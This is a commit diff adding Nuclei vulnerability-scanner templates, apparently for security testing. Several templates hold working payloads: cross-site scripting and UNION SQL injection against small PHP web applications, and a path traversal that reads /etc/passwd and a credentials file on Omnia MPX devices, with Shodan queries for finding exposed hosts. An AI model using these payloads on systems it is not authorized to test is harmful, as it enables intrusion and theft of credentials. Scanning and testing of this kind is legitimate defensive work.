up PoCs 2022-09-06

Author: hktalent

config/nuclei-templates/cves/2014/CVE-2014-8676.yaml

@@ -16,7 +16,7 @@ info:
     cvss-score: 5.3
     cve-id: CVE-2014-8676
     cwe-id: CWE-22
-  tags: cve,cve2014,soplanning,lfi,packetstorm
+  tags: packetstorm,edb,seclists,cve,cve2014,soplanning,lfi
 
 requests:
   - method: GET

config/nuclei-templates/cves/2021/CVE-2021-42663.yaml

@@ -0,0 +1,53 @@
+id: CVE-2021-42663
+
+info:
+  name: Online Event Booking and Reservation System version 2.3.0 - Cross Site Scripting
+  author: fxploit
+  severity: medium
+  description: |
+    An HTML injection vulnerability exists in Sourcecodester Online Event Booking and Reservation System in PHP/MySQL via the msg parameter to /event-management/index.php. An attacker can leverage this vulnerability in order to change the visibility of the website. Once the target user clicks on a given link he will display the content of the HTML code of the attacker's choice.
+  reference:
+    - https://github.com/0xDeku/CVE-2021-42663
+    - https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-42663
+    - https://github.com/TheHackingRabbi/CVE-2021-42663
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
+    cvss-score: 4.3
+    cve-id: CVE-2021-42663
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2021,xss
+
+requests:
+  - raw:
+      - |
+        POST /login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        name={{username}}&pwd={{password}}
+
+      - |
+        GET /views/index.php?msg=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "</i><script>alert(document.domain)</script></div>"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2021/CVE-2021-42667.yaml

@@ -0,0 +1,51 @@
+id: CVE-2021-42667
+
+info:
+  name: Online Event Booking and Reservation System version 2.3.0 - SQL injection
+  author: fxploit
+  severity: critical
+  description: |
+    A SQL Injection vulnerability exists in Sourcecodester Online Event Booking and Reservation System in PHP in event-management/views. An attacker can leverage this vulnerability in order to manipulate the sql query performed. As a result he can extract sensitive data from the web server and in some cases he can use this vulnerability in order to get a remote code execution on the remote web server.
+  reference:
+    - https://github.com/0xDeku/CVE-2021-42667
+    - https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-42667
+    - https://github.com/TheHackingRabbi/CVE-2021-42667
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-42667
+    cwe-id: CWE-89
+  metadata:
+    verified: "true"
+  tags: cve,cve2021,sqli,authenticated
+
+variables:
+  num: "999999999"
+
+requests:
+  - raw:
+      - |
+        POST /login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        name={{username}}&pwd={{password}}
+
+      - |
+        GET /views/?v=USER&ID=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2Cmd5({{num}})%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%3B--%20- HTTP/1.1
+        Host: {{Hostname}}
+
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(num)}}'
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-29004.yaml

@@ -0,0 +1,50 @@
+id: CVE-2022-29004
+
+info:
+  name: Diary Management System v1.0 - Cross-Site scripting
+  author: TenBird
+  severity: medium
+  description: |
+    Diary Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Name parameter in search-result.php.
+  reference:
+    - https://github.com/sudoninja-noob/CVE-2022-29004/blob/main/CVE-2022-29004.txt
+    - https://phpgurukul.com/e-diary-management-system-using-php-and-mysql/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29004
+  classification:
+    cve-id: CVE-2022-29004
+  metadata:
+    verified: true
+  tags: cve,cve2022,xss,authenticated,edms
+
+requests:
+  - raw:
+      - |
+        POST /edms/login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        logindetail={{username}}&userpassword={{password}}&login=
+
+      - |
+        POST /edms/search-result.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        searchdata=<script>alert(document.domain);</script>
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Serach Result Against "<script>alert(document.domain);</script>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-29005.yaml

@@ -0,0 +1,48 @@
+id: CVE-2022-29005
+info:
+  name: Online Birth Certificate System V1.2 - Stored Cross-Site scripting
+  author: TenBird
+  severity: medium
+  description: |
+    Multiple cross-site scripting (XSS) vulnerabilities in the component /obcs/user/profile.php of Online Birth Certificate System v1.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the fname or lname parameters.
+  reference:
+    - https://github.com/sudoninja-noob/CVE-2022-29005/blob/main/CVE-2022-29005.txt
+    - https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29005
+  classification:
+    cve-id: CVE-2022-29005
+  metadata:
+    verified: true
+  tags: cve,cve2022,xss,obcs,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /obcs/user/login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        mobno={{username}}&password={{password}}&login=
+
+      - |
+        POST /obcs/user/profile.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        fname=nuclei%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname=nuclei%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit=
+
+      - |
+        GET /obcs/user/dashboard.php HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(all_headers_3, "text/html")'
+          - 'status_code_3 == 200'
+          - contains(body_3, 'admin-name\">nuclei<script>alert(document.domain);</script>')
+        condition: and

config/nuclei-templates/cves/2022/CVE-2022-36642.yaml

@@ -0,0 +1,40 @@
+id: CVE-2022-36642
+
+info:
+  name: Omnia MPX 1.5.0+r1 - Path Traversal
+  author: arafatansari,ritikchaddha,For3stCo1d
+  severity: high
+  description: |
+    A local file disclosure vulnerability in /appConfig/userDB.json of Telos Alliance Omnia MPX Node through 1.5.0+r1 allows attackers to escalate privileges to root and execute arbitrary commands.
+  reference:
+    - https://www.exploit-db.com/exploits/50996
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36642
+    - https://cyber-guy.gitbook.io/cyber-guy/pocs/omnia-node-mpx-auth-bypass-via-lfd
+  classification:
+    cve-id: CVE-2022-36642
+  metadata:
+    verified: true
+    shodan-query: http.title:"Omnia MPX Node | Login"
+  tags: cve,cve2022,lfi,traversal,omnia
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd"
+      - "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"
+
+    stop-at-first-match: true
+    matchers-condition: or
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: word
+        part: body
+        words:
+          - '"username":'
+          - '"password":'
+          - '"mustChangePwd":'
+          - '"roleUser":'
+        condition: and

config/nuclei-templates/exposed-panels/appsmith-web-login.yaml

@@ -0,0 +1,29 @@
+id: appsmith-web-login
+
+info:
+  name: Appsmith Web Log In Panel
+  author: powerexploit
+  severity: info
+  description: Appsmith is a low code, open-source developer tool to build internal applications quickly. You can drag and drop pre-built widgets to build UI on a grid-style canvas.
+  reference:
+    - https://www.appsmith.com
+  metadata:
+    verified: true
+    shodan-query: http.title:"appsmith"
+  tags: panel,appsmith
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/user/login"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Appsmith</title>"
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/exposures/logs/redis-exception-error.yaml

@@ -0,0 +1,33 @@
+id: redis-exception-error
+
+info:
+  name: Redis Exception Connection Error Page
+  author: DhiyaneshDk
+  severity: low
+  reference:
+    - https://www.facebook.com/ExWareLabs/photos/pcb.5563308760399619/5563307330399762/
+  metadata:
+    verified: true
+    shodan-query: html:"redis.exceptions.ConnectionError"
+  tags: exposure,redis,logs
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'redis.exceptions.ConnectionError'
+
+      - type: word
+        part: header
+        words:
+          - text/plain
+
+      - type: status
+        status:
+          - 500

config/nuclei-templates/misconfiguration/aws-xray-application.yaml

@@ -0,0 +1,34 @@
+id: aws-xray-application
+
+info:
+  name: AWS X-Ray Sample Application
+  author: DhiyaneshDk
+  severity: info
+  description: AWS X-Ray is a service that helps developers analyze and debug distributed applications.
+  reference:
+    - https://www.facebook.com/ExWareLabs/photos/a.361854183878462/5566269380103557/
+  metadata:
+    verified: true
+    shodan-query: title:"AWS X-Ray Sample Application"
+  tags: misconfig,aws,x-ray,amazon
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>AWS X-Ray Sample Application</title>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/misconfiguration/ec2-instance-information.yaml

@@ -0,0 +1,33 @@
+id: ec2-instance-information
+
+info:
+  name: EC2 Instance Information
+  author: DhiyaneshDk
+  severity: low
+  reference:
+    - https://www.facebook.com/ExWareLabs/photos/a.361854183878462/5567070616690100/
+  metadata:
+    verified: true
+    shodan-query: title:"EC2 Instance Information"
+  tags: misconfig,ec2,aws,amazon
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>EC2 Instance Information</title>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200